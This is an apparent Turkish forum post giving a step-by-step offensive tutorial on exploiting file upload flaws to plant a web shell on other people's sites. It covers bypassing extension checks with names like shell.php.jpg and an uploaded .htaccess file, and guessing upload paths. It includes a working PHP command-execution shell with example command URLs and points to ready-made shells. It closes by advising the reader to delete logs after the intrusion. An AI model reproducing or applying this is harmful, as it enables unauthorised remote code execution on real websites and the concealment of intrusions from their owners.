Dosya Yükleme Açığını Kullanarak Web Shell Atma

Selamün aleyküm


Birçok sitede dosya yükleme açıkları oluyor ve bu açık sayesinde direk web shell atabiliyoruz.


Öncelikle hedef sitenin dosya yükleme özelliği olan bir yerine ihtiyacımız var. Genelde haber siteleri, e-ticaret siteleri, forumlar ve yönetim panellerinde bu tür yerler bulunur.

​

Adım Adım Nasıl Yapılır​

​

1. Siteyi incele ve dosya yükleme alanı bul (genelde “resim yükle”, “dosya ekle”, “profil fotoğrafı” gibi yerler)​
2. Normalde sadece resim (jpg, png) yükleyebiliyorsa, dosya uzantısını değiştirmeyi dene. Mesela shell.php.jpg şeklinde kaydetmeyi dene.​
3. Eğer site uzantı kontrolü yapmıyorsa veya kontrolü zayıfsa shell.php diye dosya yüklemeyi dene.​
4. Yükleme başarılı olursa dosyanın nereye yüklendiğini bulman lazım. Genelde şu yollar olur:
   
   • /uploads/​
   • /images/​
   • /files/​
   • /assets/​
5. Dosya yüklendikten sonra tarayıcıda şu şekilde açmayı dene:
   
   text
   
   siteadi.com/uploads/shell.php
   
   ​

Eğer sayfa boş açılıyorsa veya kod çalışıyorsa web shell’in aktif demektir.

​

Bir Web Shell Örneği​

Aşağıdaki kodu shell.php olarak kaydedip yükleyebilirsin:


PHP

<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>



Yükledikten sonra şöyle kullan:


text

siteadi.com/uploads/shell.php?cmd=whoami
siteadi.com/uploads/shell.php?cmd=ls
siteadi.com/uploads/shell.php?cmd=id



Daha gelişmiş shell istersen hazır web shell dosyalarını (c99, b374k gibi) da kullanabilirsin.

​

Dikkat Edilecekler​

​

• Bazı siteler yüklenen dosyaları rename ediyor, o zaman uzantı bypass yöntemleri denemen lazım.​
• .htaccess dosyası yükleyip exec izni açmayı da deneyebilirsin.​
• Yükleme sonrası logları silmeyi unutma.​

Bu yöntem özellikle eski scriptlerde ve kötü kodlanmış sitelerde çok işe yarıyor.


Başka bir yöntem isterseniz söyleyin, onları da yazarım.


Saygılar...​